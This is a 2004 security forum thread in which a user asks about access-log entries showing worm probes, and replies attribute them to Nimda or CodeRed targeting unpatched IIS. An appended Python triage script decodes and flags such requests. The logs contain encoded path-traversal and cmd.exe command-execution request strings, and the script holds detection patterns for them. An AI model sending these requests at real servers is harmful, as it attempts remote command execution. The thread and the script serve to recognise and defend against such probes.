Security and Cryptography
 
#1 Hovi, January 11th, 2004, 02:05 PM
Should i worry?

I saw this in my access log:
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"

Should I worry, and what is this person trying to do?
Thanks in advance.

#2 c444l, January 12th, 2004, 02:08 AM
It's not a person (if it is, it's just a script kiddie). This is most likely a worm, and probably something in the CodeRed family. Of course, I'm just guessing here.

Unless this is a Microsoft server, this is probably not an issue at all. This crap will come through all the time as various worms start puking their code out to IPs.

If this is a Microsoft server, better check for trojans, viruses, and worms. But if you're all patched up, this exploit shouldn't work anymore anyway.

(And I don't mean to sound like I underestimate the damage of script kiddies. They're usually clumsy enough to break something.)

#3 alexgreg, January 12th, 2004, 02:26 PM
This is caused by the Nimda worm. See http://www.symantec.com/avcenter/ve...nimda.a@mm.html

It only works against unpatched Microsoft IIS 4/5 servers. Since you're running Apache, you're safe.
__________________
Alex
(http://www.alex-greg.com)
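
Added example, not part of the original thread or any poster's code: a small triage script for access-log entries like the ones in post #1. It peels nested percent-encoding (`%255c` decodes to `%5c`, then to `\`), flags the overlong `%c0`/`%c1` byte pairs, and reports per source IP whether any probe received a 2xx/3xx response. The tag names and the `classify`/`summarize` helpers are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Apache common/combined format: host ident user [time] "method target proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
TARGET_RE = re.compile(rb"(cmd|root)\.exe", re.I)  # binaries requested in the excerpt
OVERLONG_RE = re.compile(rb"[\xc0\xc1].", re.S)    # 0xC0/0xC1 never begin valid UTF-8

def classify(raw_path):
    """Return the set of probe indicators found in one request path."""
    data, rounds = raw_path.encode("utf-8"), 0
    while rounds < 5:  # bounded peel of nested percent-encoding
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    tags = set()
    if TARGET_RE.search(data):
        tags.add("shell-binary")
    if rounds > 1:
        tags.add("multi-encoded")
    if OVERLONG_RE.search(data):
        tags.add("overlong-utf8")
    if b"..\\" in data or b"../" in data:
        tags.add("traversal")
    return tags

def summarize(lines):
    """Per source IP: number of probes and how many got a 2xx/3xx response."""
    report = {}
    for m in filter(None, map(LOG_RE.match, lines)):
        host, _method, target, status = m.groups()
        if classify(target.split("?", 1)[0]):
            entry = report.setdefault(host, {"probes": 0, "answered": 0})
            entry["probes"] += 1
            entry["answered"] += int(status[0] in "23")
    return report

SAMPLE = [  # first three lines are from the excerpt in post #1; the last is constructed
    '66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"',
    '66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"',
    '66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"',
    '192.0.2.10 - - [11/Jan/2004:14:30:00 -0500] "GET /index.html HTTP/1.0" 200 512 "-" "-"',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

An `answered` count of zero, as with the 404 and 400 responses in the posted log, means the server served none of the probed paths.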
